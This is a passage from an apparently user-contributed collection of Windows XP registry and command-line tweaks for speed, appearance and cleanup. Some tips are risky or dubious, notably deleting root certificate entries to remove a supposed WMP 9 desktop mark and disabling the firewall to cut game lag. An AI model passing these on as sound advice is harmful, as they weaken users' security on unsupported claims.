/&gt;SPEED UP DETAILED VIEW IN WINDOWS EXPLORER.&lt;br /&gt;If you like to view your files in Windows Explorer using the "Details" view here is a tweak to speed up the listing of file attributes: Viewing files in Windows Explorer using the "Details" mode shows various attributes associated with each file shown. Some of these must be retrieved from the individual files when you click on the directory for viewing. For a directory with numerous and relatively large files (such as a folder in which one stores media, eg: *.mp3's, *.avi's etc.)&lt;br /&gt;&lt;br /&gt;Windows Explorer lags as it reads through each one. Here's how to disable viewing of unwanted attributes and speed up file browsing:&lt;br /&gt;1. Open Windows Explorer&lt;br /&gt;2. Navigate to the folder which you wish to optimize.&lt;br /&gt;3. In "Details" mode right click the bar at the top which displays the names of the attribute columns.&lt;br /&gt;4. Uncheck any that are unwanted/unneeded.&lt;br /&gt;Explorer will apply your preferences immediately, and longs lists of unnecessary attributes will not be displayed. Likewise, one may choose to display any information which is regarded as needed, getting more out of Explorer.&lt;br /&gt;&lt;br /&gt;WEB PAGES SLOWS DOWN, FIX.&lt;br /&gt;The tweak is simple. Beside the QoS and others around the Internet for the new XP OS, I found out that native drivers sometimes slow you down (cable and xDSL users). So if you have applied all tweaks and you are still having slow downs try reinstalling your NICs drivers. The difference is noticeable. My web pages now load almost instantly where they used to take even a minute!&lt;br /&gt;&lt;br /&gt;FIX IE 6 SLOWDOWNS AND HANGS.&lt;br /&gt;1. Open a command prompt window on the desktop (Start/Run/command).&lt;br /&gt;2. Exit IE and Windows Explorer (iexplore.exe and explorer.exe, respectively, in Task Manager, i.e - Ctrl-Alt-Del/Task Manager/Processes/End Process for each).&lt;br /&gt;3. Use the following command exactly from your command prompt window to delete the corrupt file:&lt;br /&gt;C:\&gt;del "%systemdrive%\Documents and Settings\%username%\Local&lt;br /&gt;Settings\Temporary Internet Files\Content.IE5\index.dat"&lt;br /&gt;4. Restart Windows Explorer with Task Manager (Ctrl-Alt-Del/Task Manager/Applications/New Task/Browse/C:\Windows\explorer.exe[or your path]) or Shutdown/Restart the computer from Task Manager.&lt;br /&gt;&lt;br /&gt;SPEED UP WEB BROWSING.&lt;br /&gt;Iv'e personally found a dramatic increase in web browsing after clearing the Windows XP DNS cache. To clear it type the following in a command prompt: ipconfig /flushdns.&lt;br /&gt;&lt;br /&gt;ALLOW MORE THAN 2 SIMULTANEOUS DOWNLOADS ON IEXPLORER 6.&lt;br /&gt;This is to increase the the number of max downloads to 10.&lt;br /&gt;1. Start Registry Editor (Regedt32.exe).&lt;br /&gt;2. Locate the following key in the registry:&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings&lt;br /&gt;3. On the Edit menu, click Add Value , and then add the following registry values:&lt;br /&gt;"MaxConnectionsPer1_0Server"=Dword:0000000a&lt;br /&gt;"MaxConnectionsPerServer"=Dword:0000000a&lt;br /&gt;4. Quit Registry Editor.&lt;br /&gt;&lt;br /&gt;IPV6 INSTALLATION FOR WINDOWS XP.&lt;br /&gt;This protocol is distined to replace the Internet Protocal Version 4 used by Internet Explorer it uses hexadecimal ip addresses instead of decimal example (decimal ip 62.98.231.67) (hexadecimal IP 2001:6b8:0:400::70c)&lt;br /&gt;To install To install the IPv6 Protocol for Windows XP:&lt;br /&gt;Log on to the computer running Windows XP with a user account that has local administrator privileges. Open a command prompt. From the Windows XP desktop, click Start, point to Programs, point to Accessories, and then click Command Prompt. At the command prompt, type: ipv6 install&lt;br /&gt;For more information on IPv6, visit the site below:&lt;br /&gt;CODE&lt;br /&gt;http://www.microsoft.com/windowsxp/pro/techinfo/administration/ipv6/default.asp&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ANOTHER WAY TO FIX IEXPLORER 6 SLOW PAGES LOADED.&lt;br /&gt;Here's an easier way to get to index.dat file as addresse in another tweak submitted here.&lt;br /&gt;1. click on Internet Explorer&lt;br /&gt;2. go to to your root dir (usually C:)&lt;br /&gt;3. open Documents and Settings folder&lt;br /&gt;4. open "your username folder"&lt;br /&gt;5. open UserData&lt;br /&gt;6. **close IE if you have it open**&lt;br /&gt;rename index.dat to index.old&lt;br /&gt;logoff and log back on (don't need to restart) open up IE and go to a web page or site that always seemed to load slowly. It should load a lot more quickly now. NOTE. Always rename or backup .dat or other system files before deleting.&lt;br /&gt;&lt;br /&gt;EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.&lt;br /&gt;Start the Registry Editor Go to:&lt;br /&gt;HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \&lt;br /&gt;Right-click an empty space in the right pane and select New &gt; DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.&lt;br /&gt;&lt;br /&gt;DRIVE ICONS.&lt;br /&gt;To set the icon of any drive (hard disk, cd rom or anything else) with a letter (C:\ etc.), run REGEDIT (Start -&gt; Run -&gt; regedit)&lt;br /&gt;Navigate to:&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer&lt;br /&gt;If one doesn't already exist, create a new KEY called "DriveIcons". Under this key, create a new key with the letter of your drive. I.e. C for your C:\ drive.&lt;br /&gt;To change the icon for that drive, create a key inside that one called DefaultIcon and set the path of (Default) to the location of your icon&lt;br /&gt;eg C\DefaultIcon\ then (Default) = D:\Documents\C Drive Icon.ico&lt;br /&gt;To change the name of that drive, create a key in the drive letter one (eg C\) called DefaultLabel and set the (Default) to what you want the drive to be called. This is useful if you want to assign a long name to the floppy drive.&lt;br /&gt;&lt;br /&gt;CHANGING OEM REGISTRATIONS.&lt;br /&gt;Have you used someone's new Hewlet Packard with their OEM version of Windows XP? You've seen that HP has their own icon in the Start Menu, underneath Run, that goes to their Help Site. Now, you can have your icon that does anything you want (website, program, etc) and says anything you want. Basically, you are "branding" Windows XP (Home or Pro), great for if you are a computer builder and sell them, or you just want to make Windows XP your own. It involves Regedit.&lt;br /&gt;1. Start up Notepad and creat a new registry file (*.reg) and copy and paste the following into it:&lt;br /&gt;Windows Registry Editor Version 5.00&lt;br /&gt;[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}]&lt;br /&gt;@="YOUR COMPANY NAME"&lt;br /&gt;[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\DefaultIcon]&lt;br /&gt;@="YOUR ICON HERE"&lt;br /&gt;00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,68,00,70,00,6c,00,69,00,\&lt;br /&gt;6e,00,6b,00,2e,00,69,00,63,00,6f,00,00,00&lt;br /&gt;[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\InProcServer32]&lt;br /&gt;@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\&lt;br /&gt;00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,68,00,\&lt;br /&gt;64,00,6f,00,63,00,76,00,77,00,2e,00,64,00,6c,00,6c,00,00,00&lt;br /&gt;"ThreadingModel"="Apartment"&lt;br /&gt;[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\Instance]&lt;br /&gt;"CLSID"="{3f454f0e-42ae-4d7c-8ea3-328250d6e272}"&lt;br /&gt;[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\Instance\InitPropertyBag]&lt;br /&gt;"CLSID"="{13709620-C279-11CE-A49E-444553540000}"&lt;br /&gt;"method"="ShellExecute"&lt;br /&gt;"Command"="YOUR TITLE HERE"&lt;br /&gt;"Param1"="YOUR FUNCTION HERE"&lt;br /&gt;[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\shellex]&lt;br /&gt;[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\shellex\ContextMenuHandlers]&lt;br /&gt;[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\shellex\ContextMenuHandlers\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}]&lt;br /&gt;@=""&lt;br /&gt;[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\shellex\MayChangeDefaultMenu]&lt;br /&gt;@=""&lt;br /&gt;[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\ShellFolder]&lt;br /&gt;"Attributes"=dword:00000000&lt;br /&gt;2. Edit where it says YOUR ICON HERE to a path to an icon (ex. c:\\icon.ico), it must be 24x24 pixels and in *.ico format. Use double back slash for path names.&lt;br /&gt;3. Edit both places where it says YOUR TITLE HERE to what you want it to say in the Start Menu (ex. Elranzer Homepage).&lt;br /&gt;4. Edit where it says YOUR FUNCTION here to what you want it to do when you click it, it can be anything... your website, a local HTML document, a program, a Windows funtion, whatever your imagination can provide (ex. http://www.shareordie.com).&lt;br /&gt;5. Save this file as brand.reg, double-click it to enterin your information, and refresh Explorer (log off/on) to see it in the Start Menu!! This works in both Home and Professional (and probably 64-Bit Professional) Editions!&lt;br /&gt;&lt;br /&gt;ORIGINAL WALLPAPERS.&lt;br /&gt;This is more of a fun tweak than it is useful. Go to run, type regedit press ok. when that comes up go to HKEY_CURRENT_USER&gt;Control Panel&gt;Desktop&lt;br /&gt;Now find the orginalwallpaper, right click and select modify.In the text box type the path to the file you want to be your orginal desktop wallpaper.&lt;br /&gt;&lt;br /&gt;DELETING My eBooks AND SPECIALS FOLDER IN MY DOCUMENTS.&lt;br /&gt;Click Start, then Run and type: regsvr32 /u mydocs.dll&lt;br /&gt;then delete them.&lt;br /&gt;&lt;br /&gt;DISABLE WINDOWS PICTURE AND FAX VIEWER.&lt;br /&gt;By default, Windows XP opens all picture files (gif,jpg,...) with the included Windows Picture and Fax Viewer no matter what other picture viewers you have installed. To disable the Windows Picture and Fax Viewer, unregister shimgvw.dll. This can be done from command prompt: regsvr32 /u shimgvw.dll&lt;br /&gt;&lt;br /&gt;REMOVE PAST ITEMS ICONS IN TASKBAR.&lt;br /&gt;Some times When you check your TasKbar properties or when you hide or unhide icons you can see old icons from Uninstalled or old programs you dont have anymore. This Tweak will help you how to get rid of this problem Thanks to leobull of Xperience.or How To clear the Past Items or Icons list in the TaskBar, perform the following steps:&lt;br /&gt;1.Open Regedit Navigate to:&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify&lt;br /&gt;2.Delete the IconStreams and PastIconsStream values&lt;br /&gt;3.Open Task Manager, click the Processes tab, click Explorer.exe , and then click End Process .&lt;br /&gt;4.In Task Manager, click File , click New Task , type explorer , and then click OK .&lt;br /&gt;&lt;br /&gt;LOCKING COMPUTERS.&lt;br /&gt;To lock a computer in XP, as you probably know, you press "L" while holding down "Windows Logo" key on your keyboard. However, if you would like to lock a computer remotely, for example via "Remote Administrator", you don't have this ability. What you can do instead, is to create a shortcut on remote computer's desktop where Target %windir%\System32\rundll32.exe user32.dll,LockWorkStation Start In %windir%&lt;br /&gt;&lt;br /&gt;ADMINISTRATOR IN WELCOME SCREEN.&lt;br /&gt;When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.&lt;br /&gt;First you must ensure that the Administrator Account is enabled:&lt;br /&gt;1 open Control Panel&lt;br /&gt;2 open Administrative Tools&lt;br /&gt;3 open Local Security Policy&lt;br /&gt;4 expand Local Policies&lt;br /&gt;5 click on Security Options&lt;br /&gt;6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.&lt;br /&gt;1 open Control Panel&lt;br /&gt;2 open User Accounts&lt;br /&gt;3 click Change the way users log on or log off&lt;br /&gt;4 untick Use the Welcome Screen&lt;br /&gt;5 click Apply Options&lt;br /&gt;You will now be able to log on to Windows XP as Administrator in Normal Mode.&lt;br /&gt;&lt;br /&gt;BUGFIXES.&lt;br /&gt;This is a strange bug in Windows XP Pro but it can and does happen to everyone. When you open the My Computer screen and your Documents folder is missing but all the other users folders are there try this tweak.&lt;br /&gt;STEP 1:&lt;br /&gt;START &gt; RUN &gt; REGEDIT &gt; HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / Current Version / Explorer / DocFolderPaths&lt;br /&gt;Once you click the DocFolderPaths folder you should see all the user's folders.&lt;br /&gt;STEP 2:&lt;br /&gt;Add a new string value&lt;br /&gt;Value Name: your user name&lt;br /&gt;Value Data: the path to your docs folder ( ex. C:\Documents and Settings\your docs folder )&lt;br /&gt;Exit Registry editor and open my computer, your docs folder should now be visable.&lt;br /&gt;&lt;br /&gt;MOUSE POINTERS.&lt;br /&gt;It seems that even without pointer precision disabled, the mouse under XP is still influenced by an acceleration curve. This is especially noticeable in games. To&lt;br /&gt;&lt;br /&gt;completely remove mouse acceleration from XP, you will need to go into the registry and adjust the SmoothmouseXYCurve values. Here is how its done.&lt;br /&gt;1. Click Start button&lt;br /&gt;2. Select Run&lt;br /&gt;3. Type 'regedit' in the open textbox&lt;br /&gt;4. Open the tree 'HKEY_CURRENT_USER', select control panel, then select mouse&lt;br /&gt;5. Right clicking, modify the SmoothMouseXCurve and SmoothMouseYCurve hexidecimal values to the following:&lt;br /&gt;SmoothMouseXCurve:&lt;br /&gt;00,00,00,00,00,00,00,00&lt;br /&gt;00,a0,00,00,00,00,00,00&lt;br /&gt;00,40,01,00,00,00,00,00&lt;br /&gt;00,80,02,00,00,00,00,00&lt;br /&gt;00,00,05,00,00,00,00,00&lt;br /&gt;SmoothMouseYCurve:&lt;br /&gt;00,00,00,00,00,00,00,00&lt;br /&gt;66,a6,02,00,00,00,00,00&lt;br /&gt;cd,4c,05,00,00,00,00,00&lt;br /&gt;a0,99,0a,00,00,00,00,00&lt;br /&gt;38,33,15,00,00,00,00,00&lt;br /&gt;If done correctly, you will notice you are holding a markedly more responsive mouse.&lt;br /&gt;&lt;br /&gt;HIDDEN WINDOWS XP ICONS.&lt;br /&gt;Windows XP Pro and Home contains icons for folders and files that cannot normally be seen, you can select to view hidden files from the folder options menu, but there are still some that remain hidden.&lt;br /&gt;You can set windows to view these files as normal hidden files, so that when you use the view hidden files and folders toggle from the folder options menu that these will be turned on/off along with the normal hidden files.&lt;br /&gt;These files are usually system files and should not be altered/deleted unless you really know what you are doing, if you don't yet still wish to change them I might suggest that you create back-ups of your system first.&lt;br /&gt;I will personally accept no responsibility for any damage caused by using this tweak. To view the hidden files you need to open up regedit, if you are not sure how to do this, select run from the start menu and type in 'regedit' without the apostrophe's. In the regedit window, expand out the groups by clicking on the '+' next to the name in the left hand column of regedit, and navigate to the below address.&lt;br /&gt;HKEY_CURRENT_USER \SOFTWARE \MICROSOFT \WINDOWS \CURRENTVERSION \EXPLORER \ADVANCED&lt;br /&gt;when you have clicked the advanced folder on the left pane, look down the list at the titles in the right hand pane, one of those titles is 'ShowSuperHidden'&lt;br /&gt;double click the title and in the window that appears set the value to equal 1 to show the super hidden files and 0 to hide them.&lt;br /&gt;&lt;br /&gt;XP HOME ADVANCED FILE PERMISSIONS.&lt;br /&gt;This is actually an addition to my previous post entitled "Get XP Pro file security with XP Home". In the aforementioned post I outlined how to access&lt;br /&gt;*Advance file Permissions* on NTFS file systems for XP Home simply by booting into *Safe Mode*, rt-clicking any file or folder, and navigating to the *Security tab*. This gives the user the ability to allow or deny read, write, execute, read &amp; write, display contents, full-control, iheritance, and take ownership permissions, with many more options available to apply to different users and groups stored on the computer. Well, you don't have to do this in *Safe Mode* (XP Home). Although it is a little less intuitive, you can simply go to your command prompt - Start&gt;All Programs&gt;Accessories&gt;Command Prompt. Now type "cacls" in the window (without the quotes). This gives you the ability to add, remove or modify file permissions on files and folders through the command prompt. Type "cacls /?" for help on different options and variables. You do not need to be in safe mode to use this so it makes it a little quicker than using the safe mode security tab GUI. Remember - this only applies to NTFS. Here also is a very useful link to find a lot of extras and tweaks straight from the horse's mouth - the Microsoft Resource Center. You will find a lot of very useful web-based extra's here, most of them left unknowing to the general public - such as, "Online Crash Analysis" - a site that looks like Windows Update but you can upload your crash "dump logs" (when you get those system or application crash error reports). Microsoft will then analyze the log file and tell you some more info about WHY the system crashed (ie. faulty hardware/software/conflicts, etc).&lt;br /&gt;&lt;br /&gt;FLASHGET :BYPASSING 8 MAX SIMULTANEOUS JOBS.&lt;br /&gt;Users of Flash get will notice that the maximum number of file splits is 8. This number can be increased by the tweak below:&lt;br /&gt;1. Run regedit.&lt;br /&gt;2. Navigate to [HKEY_CURRENT_USER\Software\JetCar\JetCar\General\]&lt;br /&gt;3. Right Click -&gt; Add String Value.&lt;br /&gt;4. Name as MaxSimJobs -&gt; Set the value as what ever number you want.&lt;br /&gt;After a restart you should be able to download with more file splits.&lt;br /&gt;&lt;br /&gt;OUTLOOK EXPRESS WINDOWS TITLE TWEAKS.&lt;br /&gt;Change the window title of Outlook Express to anything you want!&lt;br /&gt;In regedt32 and navigate to HKEY_CURRENT_USER\Identities\{EE383506-901D-43C6-8E40-9A61901DF7CC}\Software\Microsoft\Outlook Express\5.0. Add a new string key called WindowTitle and make its value the desired window title. Then close the registry editor, and restart Outlook Express (if it's running.) Your new title now shows up in the title bar!&lt;br /&gt;&lt;br /&gt;WINDOWS MEDIA PLAYER 9.&lt;br /&gt;When installing WMP 9 it leaves a watersign on your desktop. You can easily remove this with: regedit:&lt;br /&gt;HKey_Local_Machine\SOFTWARE\microsoft\system certificates\CA\certificates\FEE449EE0E3965A5246F00E87FDE2A065FD89D4&lt;br /&gt;HKey_Local_Machine\software\microsoft\system certificates\ROOT\certificates\2BD63D28D7BCD0E251195AEB519243C13142EBC3&lt;br /&gt;Remove both lines and restart computer.&lt;br /&gt;&lt;br /&gt;CHANGING THE WINDOWS MEDIA PLAYER TITLEBAR.&lt;br /&gt;This is a per-user tweak. Open RegEdit.&lt;br /&gt;Browse to the following key:&lt;br /&gt;HKEY_USERS\S-1-5-21-xxxxxxxxx-xxxxxxxxx-xxxxxxxxxx-xxxx\Software\Policies\Microsoft\WindowsMediaPlayer&lt;br /&gt;(the x's will vary from computer to computer , it's the key without the "_Classes" at the end) Create the following String, "TitleBar" , the value of this will now become the TitleBar of Windows Media Player.&lt;br /&gt;&lt;br /&gt;AUTO DELETE TEMPORARY FOLDER.&lt;br /&gt;First go into gpedit.msc&lt;br /&gt;Next select -&gt; Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder&lt;br /&gt;Then right click "Do Not Delete Temp Folder Upon Exit"&lt;br /&gt;Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.&lt;br /&gt;&lt;br /&gt;CLEANUP STARTUP ITEMS IN MSCONFIG.&lt;br /&gt;Do you ever uninstall programs and they are still listed under startup items in msconfig? Personally, I found myself with 30 such items from old installs. Microsoft leaves you no way to clean up this list, but have no fear, I have figured it out for you.&lt;br /&gt;1. Open MSconfig and click on the startup items tab&lt;br /&gt;2. Open Regedit and naviate to HKLM/Software/Microsoft/Sharedtools/MSconfig/startupreg&lt;br /&gt;3. Compare the list of registry keys under startup reg with their counterparts in msconfig.&lt;br /&gt;4. Delete the keys which are no longer valid.&lt;br /&gt;5. Voila! You've cleaned up msconfig.&lt;br /&gt;&lt;br /&gt;REMOVING SERVICES DEPENDENCIES.&lt;br /&gt;This will allow you to disable a service or uninstall it from your system without effecting another service that depends on it. Here's how you do it&lt;br /&gt;1. After you have set your services the way you want them and you have disabled/uninstalled something that another services depends on, run "regedit"&lt;br /&gt;2. Under HKEY_LOCAL_MACHINE\System\find the service that will not function, do to another service being disabled/uninstall (found in ControlSet001\Services, ControlSet002\Services, and CurrentControlSet\Services)&lt;br /&gt;3. Once you have found the service right-click on the string value, "DependOnService,"and modify&lt;br /&gt;4. You should now see a list of services that it is dependent on. Simply delete the service that you have disabled/uninstalled&lt;br /&gt;5. Restart your computer and your ready to go Disclaimer REMEMBER TO BACKUP YOU REGISTRY FIRST I'm not totaly sure if this will have any negative effects on your system. I used this method after uninstalling "Netbios over Tcpip" from my system completely, so that my Dhcp service would function and I have had NO negative effects on my system.&lt;br /&gt;&lt;br /&gt;ANOTHER WAY TO DELETE HIDDEN DEVICES.&lt;br /&gt;You can view and delete or modify hidden devices by:&lt;br /&gt;1. Openning Device Manager. (I usually right-click on My Computer, select Properties, select the Hardware tab, then select Device Manager.)&lt;br /&gt;2. Select View and check "Show hidden devices"&lt;br /&gt;3. Hidden devices will appear below with the others and can be modified.&lt;br /&gt;&lt;br /&gt;HOW TO GET "My Briefcase" IN WINDOWS XP.&lt;br /&gt;go to C:\WINDOWS\system32\dllcache. look for a file named "syncapp".&lt;br /&gt;double click it. an icon should appear on your desktop that says "My Briefcase". double click it. it will come up with this window that tells you how to use it.&lt;br /&gt;&lt;br /&gt;TURN NUMLOCK ON AT LOGON.&lt;br /&gt;NumLock does not toggle on by default (system-wide), even if you have it set in your PC's BIOS, because of XP's multi-user functionality. Guess Microsoft doesn't know everyone actually turns it on, which should be reason enough for what acts as "default"...&lt;br /&gt;Anyway, you can hack the Windows Registry to change this behavior, or run a script at logon to turn NumLock on.&lt;br /&gt;1. To enable NumLock through the Registry:&lt;br /&gt;* Open Windows' Registry Editor (START &gt; RUN, type "REGEDIT").&lt;br /&gt;*. Navigate to HKEY_USERS\.Default\Control Panel\Keyboard.&lt;br /&gt;*. Change the value for InitialKeyboardIndicators from 0 to 2.&lt;br /&gt;2. To enable NumLock using a script, see this MS Knowledgebase article for complete instructions:&lt;br /&gt;CODE&lt;br /&gt;http://support.microsoft.com/directory/article.asp?ID=KB;EN-US;Q262625&lt;br /&gt;&lt;br /&gt;Option 1 is the quicker method, but if you have more than one user on your system and one or more don't want NumLock on (stranger things have been known of), then option 2 is the way to go since it allows you to only attach the script to specific users.&lt;br /&gt;&lt;br /&gt;FREE DISK SPACE BY DELETING RESTORE POINTS.&lt;br /&gt;Start button-all programs-accessories-system tools-cleanup-more options. You will have the option of deleting your restore points.When your done creat one&lt;br /&gt;restore point as a back up.&lt;br /&gt;&lt;br /&gt;HOW TO REAL GET RID OF UNNECESSARY SOFTWARE&lt;br /&gt;to uninstall things like msn messenger and other hidden installs thru add remove programs, do this: find sysoc.inf (you might have to enable "show hidden files" and "show hidden/protected system folders" in explorer) and open it in notepad replace all ",hide" with "," (both with out quotes) which is easiest to do with the replace all command under edit then in add/remove programs under add/remove windows compnents and whole new list of things to uninstall and add are now listed (such as internet explorer)&lt;br /&gt;&lt;br /&gt;HAVING PROGRAMS RUN WHEN WINDOWS LOADS SLOWS DOWN YOUR STARTUP.&lt;br /&gt;There are two ways do disable programs that may be in your startup (like icq, messanger,) The easiest is to do the following:&lt;br /&gt;1. start --&gt; run --&gt; msconfig&lt;br /&gt;2. Click on the "startup" tab (furthest right)\&lt;br /&gt;3. Unclick any items you don't want to load when windows starts.&lt;br /&gt;The second is by deleting registry entrys, this can be done the following way:&lt;br /&gt;1. Start --&gt; run --&gt; regedit&lt;br /&gt;2. Navigate to : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;3. Delete any entry's that you don't want to load up&lt;br /&gt;&lt;br /&gt;TURN OFF INDEXING TO SPEED UP XP.&lt;br /&gt;Windows XP keeps a record of all files on the hard disk so when you do a search on the hard drive it is faster. There is a downside to this and because the computer has to index all files, it will slow down normal file commands like open, close, etc. If you do not do a whole lot of searches on your hard drive then I suggest turnning this feature off:&lt;br /&gt;1. Control Panel&lt;br /&gt;2. Administrative Tools&lt;br /&gt;3. Services&lt;br /&gt;4. Disable Indexing Services&lt;br /&gt;&lt;br /&gt;HALF LIFE AND WINDOWS XP.&lt;br /&gt;1. How to recover from incompatible drivers&lt;br /&gt;Before you install new drivers set a system restore point. Start&gt;All programs&gt;Accessories&gt;system tools&gt;system restore&lt;br /&gt;After your new drivers don't work reset your computer. Press F8 repeatedly as soon as the BIOS screen disappears, and before the Windows XP screen appears. Select safe mode. Use system restore again to undo your mess.&lt;br /&gt;2. Video Drivers&lt;br /&gt;The NVidia drivers that come with XP do not allow you to run Half Life in OpenGL. Update to the newest drivers.&lt;br /&gt;Despite the fact that they are not official drivers, 22.50 was the only set which worked&lt;br /&gt;3. Sound Drivers&lt;br /&gt;Use windows update to update Creative drivers.&lt;br /&gt;4. Fixing screen flicker&lt;br /&gt;Windows XP defaults to 60Hz for games. A fix is available here:&lt;br /&gt;CODE&lt;br /&gt;http://www.fileplanet.com/dl/dl.asp?/planetquake/ztn/nvreffix-setup.exe&lt;br /&gt;&lt;br /&gt;Select "set: ev ery resolution to monitor's maximum supported rate"&lt;br /&gt;5. Fixing lag&lt;br /&gt;If you are having trouble with lag, try disabling the windows XP firewall. Go to control panel&gt;network connections. Select connection, right click, properties, advanced, untick the firewall.&lt;br /&gt;6. Mouse&lt;br /&gt;You can improve your mouse smoothness for games.&lt;br /&gt;Control panel&gt;mouse&gt;hardware&gt;properties&gt;advanced&lt;br /&gt;Change the sample rate to a higher one, eg. 200&lt;br /&gt;&lt;br /&gt;REGISTRY METHOD FOR REMOVING STARTUP ITEMS.&lt;br /&gt;I prefer to use MSCONFIG selective startup to troubleshoot. To remove entries for good, open the registry:&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN and HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN&lt;br /&gt;Delete entries of unwanted startup daemons and tray procedures.&lt;br /&gt;&lt;br /&gt;DISPLAY MESSAGE ON STARTUP.&lt;br /&gt;Start regedit, if you are unfamiliar with regedit please see our FAQ.&lt;br /&gt;Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;br /&gt;Modify the key legalnoticecaption with what you want to name the window.&lt;br /&gt;Modify the key legalnoticetext with what you want the window to say. Restart.&lt;br /&gt;&lt;br /&gt;REMOVE THE DEFAULT IMAGE VIEWER IN WINDOWS ME/XP.&lt;br /&gt;This tweak works in Windows Me/XP, I have not try it in Windows NT/2000 yet, because i don't have that OS, you can try it if you have.&lt;br /&gt;*This tweak does not work in Windows 95/98&lt;br /&gt;To remove the Windows default Image Viewer, first:&lt;br /&gt;Click Start Menu&lt;br /&gt;Select Run menu&lt;br /&gt;Type "cmd", (for Windows Me, type "command")&lt;br /&gt;Then type "regsvr32 /u shimgvw.dll" to unregister this dll. This will stop it from previewing any picture that it support, e.g. JPEG, Bitmap, GIF....&lt;br /&gt;* Before perform this tweak, make sure that you have the alternative Image Viewer installed in you windows e.g. ACDsee, FireGraphics... because once you do this tweak without that application, you can't open and view your image anymore! So, to undo it, type "regsvr32 shimgvw.dll" in command prompt.&lt;br /&gt;&lt;br /&gt;SPEED UP BOOT BY DISABLING UNUSED PORTS.&lt;br /&gt;You may have tried many tweaks like modifying windowsXP start-up applications, prefetches, unload DLLs method,etc. And yes those methods do work for me.&lt;br /&gt;I have just accidentally found out another way to give you an extra boost in windowsXP's boot performance. This is done by disabling your unused devices in&lt;br /&gt;Device Manager. for example, if you don't have input devices that are connected to one of your USBs or COM ports, disabling them will give you an extra perfromance boost in booting. Go to Control Panel -&gt; System -&gt; Hardware tab -&gt; device manager Disable devices that you don't use for your PC and then restart.&lt;br /&gt;&lt;br /&gt;CLEAR UNWANTED ENTRIES FROM ADD/REMOVE PROGRAMS.&lt;br /&gt;Run the Registry Editor (REGEDIT).&lt;br /&gt;Open HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Uninstall Remove any unwanted keys under "Uninstall."&lt;br /&gt;&lt;br /&gt;CLICKING * .AVI FILES ON EXPLORER CAUSING 100% CPU USAGE.&lt;br /&gt;Well windows seem to have a REALLY big problem when it comes to reading AVI files. It seems that when you click on an AVI file in explorer, it'll try to read the entire AVI file to determine the width,height, etc. of the AVI file (this is displayed in the Properties window). Now the problem with Windows is that if you have a broken/not fully downloaded AVI file that doesnt contain this info, Windows will scan the entire AVI file trying to figure out all these properties which in the process will probably cause 100% CPU usage and heavy memory usage. To solve this problem all you have to do is the following:&lt;br /&gt;1. Open up regedit&lt;br /&gt;2. Goto HKEY_CLASSES_ROOT\SystemFileAssociations\.avi\shellex\PropertyHandler&lt;br /&gt;3. Delete the "Default" value which should be "{87D62D94-71B3-4b9a-9489-5FE6850DC73E}"&lt;br /&gt;Voila! Please not that this will no longer provide you with the windows properties displaying the AVI file information such as width, height, bitrate etc. But its a small price to pay for saving you resources.&lt;br /&gt;NOTE: Please use caution when using regedit. Improper usage may cause windows to behave imcorrectly. Also, I cannot be held resposible. Backup your registry first.&lt;br /&gt;&lt;br /&gt;CD ROM STOPS AUTOPLAYING/AUTORUN.&lt;br /&gt;And the AutoPlay Tab has disappeared in My Computer, Devices With Removable Storage, Right Click on CDROM, Properties.&lt;br /&gt;Solution: The service: "Shell Hardware Detection" has been set to Manual or Disabled. Go to Control Panel, Administrative Tools, Services. Return this service to "Automatic".&lt;br /&gt;&lt;br /&gt;SHUTDOWN XP FASTER 1.&lt;br /&gt;Like previous versions of windows, it takes long time to restart or shutdown windows xp when the "Exit Windows" sound is enabled. to solve this problem you&lt;br /&gt;must disable this useless sound. click start button then go to settings -&gt; control panel -&gt; 